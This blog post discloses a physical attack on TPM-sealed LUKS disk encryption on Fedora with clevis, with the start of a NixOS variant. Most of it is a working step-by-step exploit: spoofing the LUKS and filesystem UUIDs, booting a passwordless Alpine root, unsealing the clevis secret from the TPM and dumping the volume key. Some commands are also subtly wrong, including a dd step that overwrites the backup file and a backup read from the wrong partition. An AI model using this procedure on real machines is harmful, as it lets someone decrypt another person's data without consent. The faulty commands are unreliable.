We start by tak­ing the main disk out and putting it into our ma­chine. You may also be able to boot a Fedora or Debian live im­age, if the owner has not wiped the Microsoft keys from their BIOS in fa­vor of their own. Once booted, we start in­ves­ti­gat­ing the disk lay­out and par­ti­tions:[root@lo­cal­host]# blkid /dev/nvme0n1p1: LABEL_FATBOOT=“EFI” LABEL=“EFI” UUID=“E2AA-BB8B” BLOCK_SIZE=“512″ TYPE=“vfat” PARTLABEL=“EFI System Partition” PARTUUID=“b9cd5e99-00ec-45e8-be33-72809ae30602” /dev/nvme0n1p2: LABEL=“boot” UUID=“d0a1796a-5c1e-446f-8b70-2910d094d195” BLOCK_SIZE=“4096″ TYPE=“ext4” PARTUUID=“e5cc6afa-285b-4bc6-8fb1-a6c5344d20a9″ /dev/nvme0n1p3: UUID=“779328d5-00ca-4ade-be44-6daa549642ed” TYPE=“crypto_LUKS” PARTUUID=“4e73c89f-3840-458a-ada6-0f5349ab36e1”

We take a quick peek at the en­crypted par­ti­tion, which is our main tar­get:[root@lo­cal­host]# crypt­setup luks­Dump /dev/nvme0n1p3 LUKS header in­for­ma­tion Version: 2 Epoch: 9 Metadata area: 16384 [bytes] Keyslots area: 16744448 [bytes] UUID: 779328d5-00ca-4ade-be44-6daa549642ed # […] Tokens: 0: cle­vis Keyslot: 1 # […]

We can al­ready see that the sys­tem owner has used

cle­vis to con­fig­ure the au­to­mated un­lock­ing. What we want to find for now is the ini­trd and ker­nel com­mand line, so some GRUB or sys­temd-boot con­fig­u­ra­tion file. Since Fedora uses pre-signed im­ages, the EFI par­ti­tion will only con­tain the loader and shim, which should­n’t con­tain any in­for­ma­tion about the ac­tual sys­tem. But the boot par­ti­tion /dev/nvme0n1p2 looks promis­ing, so let’s mount it and see what we find:[root@lo­cal­host]# mount /dev/nvme0n1p2 /mnt/boot [root@localhost]# ls -l /mnt/boot to­tal 222500 dr-xr-xr-x. 6 root root 4096 Jan 13 23:09 ./ dr-xr-xr-x. 19 root root 4096 Jan 13 23:06 ../ -rw-r–r–. 1 root root 277997 Oct 20 02:00 con­fig-6.11.4-301.fc41.x86_64 drwx–––. 3 root root 4096 Jan 1 1970 efi/ drwx–––. 3 root root 4096 Jan 13 23:10 grub2/ -rw–––-. 1 root root 139254374 Jan 13 23:09 initramfs-0-res­cue-868c201e807541­caacd6­fa6b32d5ba2e.img -rw–––-. 1 root root 45514433 Jan 14 00:54 initramfs-6.11.4-301.fc41.x86_64.img dr­wxr-xr-x. 3 root root 4096 Jan 13 23:06 loader/ drwx–––. 2 root root 16384 Jan 13 23:05 lost+found/ -rw-r–r–. 1 root root 182584 Jan 13 23:09 symvers-6.11.4-301.fc41.x86_64.xz -rw-r–r–. 1 root root 9968458 Oct 20 02:00 System.map-6.11.4-301.fc41.x86_64 -rwxr-xr-x. 1 root root 16296296 Jan 13 23:08 vm­linuz-0-res­cue-868c201e807541­caacd6­fa6b32d5ba2e* -rwxr-xr-x. 1 root root 16296296 Oct 20 02:00 vm­linuz-6.11.4-301.fc41.x86_64* -rw-r–r–. 1 root root 161 Oct 20 02:00 .vmlinuz-6.11.4-301.fc41.x86_64.hmac

Great! There are the ker­nel and ini­trd im­ages plus a

loader/ di­rec­tory con­tain­ing some GRUB en­try con­fig­u­ra­tions. We will take a look at those con­fig­u­ra­tion files first:[root@lo­cal­host]# ls -l /mnt/boot/loader/entries -rw-r–r–. 1 root root 445 Jan 13 23:10 868c201e807541caacd6fa6b32d5ba2e-0-rescue.conf -rw-r–r–. 1 root root 369 Jan 13 23:10 868c201e807541caacd6fa6b32d5ba2e-6.11.4-301.fc41.x86_64.conf [root@localhost]# cat /boot/loader/entries/868c201e807541caacd6fa6b32d5ba2e-6.11.4-301.fc41.x86_64.conf ti­tle Fedora Linux (6.11.4-301.fc41.x86_64) 41 (Server Edition) ver­sion 6.11.4-301.fc41.x86_64 linux /vmlinuz-6.11.4-301.fc41.x86_64 ini­trd /initramfs-6.11.4-301.fc41.x86_64.img op­tions root=UUID=1a887df4-286d-4842-bd66-d8993e8596d2 ro rd.luks.uuid=luks-779328d5-00ca-4ade-be44-6daa549642ed rhgb quiet grub_users $grub_users grub_arg –unrestricted grub_­class fe­dora

Wow, this is looks like we al­ready found all the im­por­tant in­for­ma­tion! Judging from the com­man­d­line syn­tax, this is likely an ini­trd that was gen­er­ated by dra­cut. There seems to be a LUKS en­crypted par­ti­tion with UUID

779328d5-00ca-4ade-be44-6daa549642ed and a root file sys­tem with UUID 1a887df4-286d-4842-bd66-d8993e8596d2, which is cer­tainly in­side of the LUKS par­ti­tion. The type of filesys­tem is not spec­i­fied, so we are free to choose any­thing that is sup­ported by the initramfs for our fake.

In the­ory, we’d need to find out one ad­di­tional thing - the bi­nary that will be called by the ini­trd when it wan­t’s to switch to the real sys­tem. But the chances are very high that it is

/sbin/init (this is not the case on all sys­tems though, see the NixOS PoC be­low for an ex­am­ple). If our as­sump­tion does­n’t work out, we can still dou­ble check by ex­tract­ing the ini­trd later.

In or­der to con­fuse the ini­trd, we now need to:Backup the orig­i­nal LUKS pari­tion so we can later de­crypt

itRe­place the LUKS par­ti­tion with a fake LUKS par­ti­tion that has

the UUID 779328d5-00ca-4ade-be44-6daa549642edThis LUKS par­ti­tion must con­tain a filesys­tem with UUID

1a887df4-286d-4842-bd66-d8993e8596d2The in­ner filesys­tem con­tains a /sbin/init bi­nary

that does what we want

We may ac­tu­ally only backup the first few megabytes of the orig­i­nal LUKS par­ti­tion and make sure our fake par­ti­tion is ex­actly the same size as our backup. By over­writ­ing just the be­gin­ning in this way we don’t have to do a full disk backup, which would oth­er­wise take a very long time and would re­quire us to bring a spare disk with us.

[root@localhost]# dd if=/​dev/​nvme0n1p3 of=/​boot/​luks-orig­i­nal.bak bs=64M count=1

We’ll abuse the free space on the boot par­ti­tion to store this backup, which makes it easy to ac­cess later. If you don’t want to tam­per too much with the orig­i­nal disk, you can of course use a small thumb drive.

Next, we cre­ate a 64MB file in which we will pre­pare our par­ti­tion. The size is a bit ar­bi­trary, it just needs to cover the LUKS and in­ner filesys­tem header and must fit our ex­ploit bi­nary. So we ini­tial­ize a new LUKS par­ti­tion with the UUID from above, and then open it and for­mat its con­tents with

ext4:[root@lo­cal­host]# trun­cate -s 64MB /root/fakeluks [root@localhost]# crypt­setup luks­For­mat /root/fakeluks –key-file

Now we could the­o­ret­i­cally pre­pare a tiny bi­nary that di­rectly ex­tracts the key from the TPM, but it’s far sim­pler just put a min­i­mal Alpine im­age there and in­stall the nec­es­sary tools to do that man­u­ally. This will also eas­ily fit into 64MB. Let’s pro­ceed by prepar­ing the Alpine filesys­tem:[root@lo­cal­host]# cd /mnt/root [root@localhost]# wget https://​dl-cdn.alpinelinux.org/​alpine/​v3.21/​re­leases/​x86_64/​alpine-mini­rootfs-3.21.2-x86_64.tar.gz [root@localhost]# tar xvf alpine-mini­rootfs-3.21.2-x86_64.tar.gz [root@localhost]# rm alpine-mini­rootfs-3.21.2-x86_64.tar.gz [root@localhost]# cat /etc/resolv.conf > /mnt/root/etc/resolv.conf # Just for DNS res­o­lu­tion at this mo­ment, so we can in­stall pack­ages in the ch­root [root@localhost]# ch­root /mnt/root /sbin/apk add \ # Install some tools that we need tpm2-tools tpm2-tss-tcti-de­vice jose crypt­setup [root@localhost]# wget -O /mnt/root/bin/clevis-decrypt-tpm \ https://​raw.githubuser­con­tent.com/​latch­set/​cle­vis/​0839ee294a2cb­b0c1ecf1749c9­ca530e­f9f59f8f/​src/​pins/​tpm2/​cle­vis-de­crypt-tpm2 [root@localhost]# chmod +x /mnt/root/bin/clevis-decrypt-tpm # Helper to re­trieve pass­word from TPM2 [root@localhost]# sed -i s/root:x/root:/’ /mnt/root/etc/passwd # Remove root pass­word

Finally, we un­mount our fake filesys­tem and over­write the first

64MB of the orig­i­nal par­ti­tion with it, then put the disk back into the orig­i­nal ma­chine and re­boot:[root@lo­cal­host]# umount /mnt/root [root@localhost]# crypt­setup close /dev/mapper/fakeluks [root@localhost]# sync [root@localhost]# dd if=/​root/​fakeluks of=/​root/​luks-orig­i­nal.bak bs=64M count=1

We will now be asked for the LUKS pass­word we just set, since the au­to­matic de­cryp­tion will ob­vi­ously not trig­ger on our fake par­ti­tion, which has no to­ken meta­data. After en­ter­ing our pass­word from above, we are greeted by the Alpine im­age. We can lo­gin as

root with­out a pass­word:Wel­come to Alpine Linux 3.21 Kernel 6.11.4-301.fc41.x86_64 on an x86_64 (/dev/tty1)

lo­cal­host lo­gin: root Welcome to Alpine!


Now let’s check whether any of the PCRs was af­fected by our op­er­a­tion:lo­cal­host:~# tp­m2_pcr­read sha1: sha256: 0 : 0x8C2AF609E626CC1687F66EA6D0E1A3605A949319514A26E7E1A90D6A35646FA5 1 : 0x299B0462537A9505F6C63672B76A3502373C8934F08A921E1AA50D3ADF4BA83D 2 : 0x3D458CFE55CC03EA1F443F1562BEEC8DF51C75E14A9FCF9A7234A13F198E7969 3 : 0x3D458CFE55CC03EA1F443F1562BEEC8DF51C75E14A9FCF9A7234A13F198E7969 4 : 0x5FDBD66C267BD9513DBC569DB0B389A37445E1AA463F9325EA921563E7FB37EB 5 : 0x38A281376260137602E5C70F7A9057E4C55830D22A02BB5A66013D6AC2576D2F 6 : 0x3D458CFE55CC03EA1F443F1562BEEC8DF51C75E14A9FCF9A7234A13F198E7969 7 : 0x4770A4FB1DAC716FEADDD77FEC9A28BB2015E809A34ADD1A9D417EEC36EC1E17 8 : 0xE3E23C0DA36FA31767885AEC7AEE3180FB2F5E0B67569C3A82C2A1C3CA88A651 9 : 0x091F6917B0C8788779F4D410046250E6747043A8CD1BD75BF90713CC6DE30D99 10: 0x2566BDF57C3AA880F7B0C480F479C0A88E0E72AE7EF3C1888035E7238BBE9257 11: 0x0000000000000000000000000000000000000000000000000000000000000000 12: 0x0000000000000000000000000000000000000000000000000000000000000000 13: 0x0000000000000000000000000000000000000000000000000000000000000000 14: 0x17CDEFD9548F4383B67A37A901673BF3C8DED6F619D36C8007562DE1D93C81CC 15: 0x0000000000000000000000000000000000000000000000000000000000000000 16: 0x0000000000000000000000000000000000000000000000000000000000000000 17: 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 18: 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 19: 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 20: 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 21: 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 22: 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 23: 0x0000000000000000000000000000000000000000000000000000000000000000 sha384: sm3_256:

The out­put for­mat is slightly dif­fer­ent to that of

sys­temd-an­a­lyze pcrs, but we can see that all val­ues are the same as in the real sys­tem. Some boards may have dif­fer­ent val­ues in PCR 1 af­ter every power cy­cle, but don’t worry, in that case you can be sure that the owner did­n’t use it ei­ther. So this means our at­tack was suc­cess­ful! We can now go ahead and re­trieve the vol­ume key of the orig­i­nal par­ti­tion.

By quickly skim­ming the cle­vis source we find that it stores a JWE to­ken in the LUKS header, which con­tains an en­crypted sec­ondary key to un­lock the par­ti­tion. It also con­tains some meta­data re­quired to have it de­crypted by the TPM, like which PCRs have to be used in the TPM con­text. Back when we in­spected the LUKS header, we found the cle­vis to­ken in slot 0, so let’s first ex­tract this to­ken:lo­cal­host:~# mount -o re­mount,rw / # This alpine im­age is not writable by de­fault lo­cal­host:~# mount /dev/nvme0n1p1 /mnt lo­cal­host:~# crypt­setup to­ken ex­port –token-id 0 /mnt/luks-original.bak | tee to­ken.json {

type”: clevis”, keyslots”: [ 1″ ], jwe”: { ciphertext”: hNNirkMsfcEWcVKfTFCY3JKNCk0x-8P4svgzkeulNhHnuaOdFQ4YfOCUUX9pkWvonfE2uivS”, encrypted_key”: ”, iv”: 5zuFP0kEuqiCh0QL”, protected”: eyJhbGciOiJkaXIiLCJlbmMiOiJBMjU2R0NNIiwiY2xldmlzIjp7InBpbiI6InRwbTIiLCJ0cG0yIjp7Imhhc2giOiJzaGEyNTYiLCJqd2tfcHJpdiI6IkFOMEFJRXFpblRfb3Y5cTZHVFo3TU1TcW0tUXgzT1RNaEN6ZTVTUUxRTDhDbGNoakFCQ3Z5Tldyd2lZalRaVzZUNG1rSjd4UF9CeDlCa2N0UXFFZzF6eUZ4aTdMcTRBWTcxWnpGOEVrano3QmRlVWZ3TV9PT2pOdGVGcmZFdUItQzRONGRhWDZ0VHk3RTBrc3BuS3luN3VRQ0p6VDVrcU4yYkpPM0FGTEpwbG1JNWxseXhVdHNQZmRSamhSTFUyWXN6V2Fvay1VQlZsNGtuOWNHTUZCNFdZQmFHd01oM0QwZjF1TjdQUVV4cGx6bWtRSmQzX1FRUGZBM3VNMDZRcXY4OU14STVCc3dra3FiWEhSVmhNNFVCOXNLcjd0dzgzVkFFdXpzZ3c5OXciLCJqd2tfcHViIjoiQUU0QUNBQUxBQUFFa2dBZ2d1X2RMZTk2Z0dyRkZycWw2NXltWG5DQ1RMWWVMYXFkQ0NfSkRRa0R4M01BRUFBZ1UwVFhKaXZhaTVuWVNONGNUT05lNkNJR0djX2ZGbDd6ZlNsNUZuOTFvU0kiLCJrZXkiOiJlY2MiLCJwY3JfYmFuayI6InNoYTI1NiIsInBjcl9pZHMiOiI0LDUsNyw5In19fQ”, tag”: 7DIhyL_ZNocrUHTPr1PQWg” } }

Clevis would then pro­ceed to ex­tract a JWE to­ken and hand it to

cle­vis-de­crypt-tpm2 which de­crypts it us­ing the TPM, so we repli­cate the pro­ce­dure:# Get the con­tents of the .jwe field lo­cal­host:~# jose fmt -j to­ken.json -Og jwe -o- | tee jwe.json {

ciphertext”: hNNirkMsfcEWcVKfTFCY3JKNCk0x-8P4svgzkeulNhHnuaOdFQ4YfOCUUX9pkWvonfE2uivS”, encrypted_key”: ”, iv”: 5zuFP0kEuqiCh0QL”, protected”: eyJhbGciOiJkaXIiLCJlbmMiOiJBMjU2R0NNIiwiY2xldmlzIjp7InBpbiI6InRwbTIiLCJ0cG0yIjp7Imhhc2giOiJzaGEyNTYiLCJqd2tfcHJpdiI6IkFOMEFJRXFpblRfb3Y5cTZHVFo3TU1TcW0tUXgzT1RNaEN6ZTVTUUxRTDhDbGNoakFCQ3Z5Tldyd2lZalRaVzZUNG1rSjd4UF9CeDlCa2N0UXFFZzF6eUZ4aTdMcTRBWTcxWnpGOEVrano3QmRlVWZ3TV9PT2pOdGVGcmZFdUItQzRONGRhWDZ0VHk3RTBrc3BuS3luN3VRQ0p6VDVrcU4yYkpPM0FGTEpwbG1JNWxseXhVdHNQZmRSamhSTFUyWXN6V2Fvay1VQlZsNGtuOWNHTUZCNFdZQmFHd01oM0QwZjF1TjdQUVV4cGx6bWtRSmQzX1FRUGZBM3VNMDZRcXY4OU14STVCc3dra3FiWEhSVmhNNFVCOXNLcjd0dzgzVkFFdXpzZ3c5OXciLCJqd2tfcHViIjoiQUU0QUNBQUxBQUFFa2dBZ2d1X2RMZTk2Z0dyRkZycWw2NXltWG5DQ1RMWWVMYXFkQ0NfSkRRa0R4M01BRUFBZ1UwVFhKaXZhaTVuWVNONGNUT05lNkNJR0djX2ZGbDd6ZlNsNUZuOTFvU0kiLCJrZXkiOiJlY2MiLCJwY3JfYmFuayI6InNoYTI1NiIsInBjcl9pZHMiOiI0LDUsNyw5In19fQ”, tag”: 7DIhyL_ZNocrUHTPr1PQWg” }

# Convert this for­mat into the ac­tual JWE to­ken for­mat lo­cal­host:~# jose jwe fmt -i jwe.json -c | tee to­ken.txt eyJh­bG­ciOiJkaXI­iL­CJlb­m­MiOi­JB­MjU2R0N­NI­i­wiY2xldm­lz­I­jp7InBp­bi­I6In­R­wbTI­iL­CJ0cG0y­I­jp7Imh­hc2­giOi­Jza­GEyN­TY­iL­CJqd2t­fcHJpdi­I6Ik­FOME­FJRXF­p­blRf­b3Y5cTZHV­Fo3­TU1TcW0­tUXgzT1R­NaEN6ZTV­TU­UxRT­D­hD­bG­Noak­FC­Q3Z5Tldy­d2lZal­RaVz­ZUNG1rSjd4UF9CeDl­Ca2N0UXF­FZ­zF6eUZ4aT­dM­c­TRB­WTcxWnp­GO­EVra­no3Qm­R­lVWZ3TV9P­T2pOdGVGcmZF­dUItQzRON­GRhWDZ0VHk3RT­Br­c3BuS3luN3VRQ0p6VD­Vr­cU4yYkpP­M0FGTEp­w­bG1JN­Wx­seX­hVdHN­QZmR­Samh­ST­FUy­WXN6V2F­vay1VQlZs­NG­tuOWN­HTUZC­NFdZQmFHd01oM0QwZjF1TjdQUVV4cGx6b­WtRSmQzX1FRUGZB­M3VN­MDZR­cXY4OU14STVC­c3­dra3­Fi­WEhSVmhN­N­FV­COXNL­cjd0dzgzVkFFdX­pz­Z3c5OX­ciL­CJqd2t­fcHVi­IjoiQU­U0QUN­BQUxBQUF­Fa2d­BZ2d1X2R­MZTk2Z0dyRkZy­cWw2NXltWG5DQ1RMWWVMYXFkQ0N­f­SkR­Ra0R4M01BRUF­BZ1UwVFhKaXZhaTVuWVNONGNUT05lNkN­JR0d­jX2ZGb­D­d6­ZlNsNUZuOT­FvU0k­iL­CJrZXkiOi­J­lY2MiL­CJwY3J­fYm­Fuay­I6In­NoYTI1Ni­Is­In­Bj­cl9pZH­MiOi­I0L­DUs­Ny­w5In19fQ..5zuF­P0kEuqiCh0QL.hN­NirkMs­fcEWcVK­fT­F­CY3JKNCk0x-8P4svgzkeulNhH­nuaOd­FQ4Y­fOCU­UX9p­kWvon­fE2uivS.7DI­hyL_ZNocrUHT­Pr1PQWg

# Use the cle­vis-de­crypt-tpm2 script to de­crypt it with the TPM2 lo­cal­host:~# cat to­ken.txt | tr -d \n’ | cle­vis-de­crypt-tpm2 4yurbtxybpBwHBi2O2Kea1vDmhjDRt6yudAKYXinsiI3EUSjwYhwZA

Awesome! We got a pass­word out of it, which is the pass­word

cle­vis orig­i­nally added to the LUKS par­ti­tion and which can be used to un­lock it! Let’s also dump the vol­ume key for fu­ture safekeeping” 🤡:[root@localhost]# crypt­setup luks­Dump /mnt/luks-original.bak –dump-volume-key –volume-key-file vol­ume-key.txt \ –key-file

At this point we only have to re­store the par­ti­tion to its orig­i­nal state and de­crypt the real par­ti­tion. We can ei­ther re­boot into a live sys­tem (possible if the Microsoft keys are still in the se­cure boot data­base) or put the disk back into a sys­tem we con­trol. Finally, we can mount the en­crypted disk to have a look in­side:[root@lo­cal­host]# dd if=/​mnt/​luks-orig­i­nal.bak of=/​dev/​nvme0n1p3 bs=64M count=1 [root@localhost]# crypt­setup luk­sOpen /dev/nvme0n1p3 orig­i­nal \ –key-file

Success! Apart from re­search­ing all of the tools and their in­ter­nals this has been a rather sim­ple process. I would even claim that with some prepa­ra­tion we can re­peat this re­li­ably in un­der 10 min­utes. All it takes is two disk swaps and a few re­boots.

Finally I can rest easy know­ing that my room­mate can make a sur­prise backup of my server’s data while I’m away 🎉. A solid 3-2-1(+1) strat­egy.

This will be very sim­i­lar to the pre­vi­ous PoC, so I skipped a lot of the boil­er­plate this time. If you are not specif­i­cally in­ter­ested in NixOS or sys­temd-crypten­roll, you can jump to the next sec­tion by click­ing here.

Secure boot on NixOS is cur­rently im­ple­mented by the awe­some


pro­ject, which does some things dif­fer­ently than what we just saw on Fedora. Most no­tably we will en­roll our own se­cure boot keys (and can wipe the mi­crosoft keys), our ker­nel and ini­trd will both be fully signed as a UKI im­age and sys­temd-boot will not al­low you to edit the com­mand line. Another small dif­fer­ence to the Fedora setup is that we will use sys­temd-crypten­roll in­stead of cle­vis.

In any case, the over­all ex­ploita­tion will be very sim­i­lar, the NixOS ini­trd also does­n’t ver­ify LUKS iden­ti­ties (as of January 2025).

Fortunately, the setup is ex­tremely sim­ple with lan­z­a­boote. I rec­om­mend hav­ing a look at their Quick Start Guide in case you don’t know the pro­ject al­ready. I’ve added the full con­fig­u­ra­tion of the test ma­chine here, in case you want to repli­cate this. The fi­nal setup steps were:# Clear se­cure boot keys, start nixos live im­age, copy flake to live im­age, then: [root@nixos]# alias nix=‘nix –experimental-features nix-command flakes”’ [root@nixos]# nix build –print-out-paths .#nixosConfigurations.nixos.config.system.build.diskoScript /nix/store/1a51ykfsdnc0rpzlawyy7rvb889l6874-disko [root@nixos]# nix build –print-out-paths .#nixosConfigurations.nixos.config.system.build.toplevel /nix/store/5yqhbkqqw1kcr13157z4am1r5i02ll0d-nixos-system-nixos-25.05.20250110.130595e

# Format and in­stall: [root@nixos]# /nix/store/1a51ykfsdnc0rpzlawyy7rvb889l6874-disko # Format disk(s) [root@nixos]# nixos-in­stall –no-root-password –system \ # Install sys­tem /nix/store/5yqhbkqqw1kcr13157z4am1r5i02ll0d-nixos-system-nixos-25.05.20250110.130595e [root@nixos]# nixos-en­ter –mountpoint /mnt — sbctl cre­ate-keys # Create and en­roll se­cure boot keys, need to re­run in­stall af­ter­wards to make lan­z­a­boote happy

# Reboot and en­roll LUKS key: [root@nixos]# sys­temd-crypten­roll /dev/disk/by-partlabel/disk-main-luks –tpm2-device=auto –tpm2-pcrs=0+2+4+7 # … Enter pass­word … New TPM2 to­ken en­rolled as key slot 1.


Read the original on oddlama.org »

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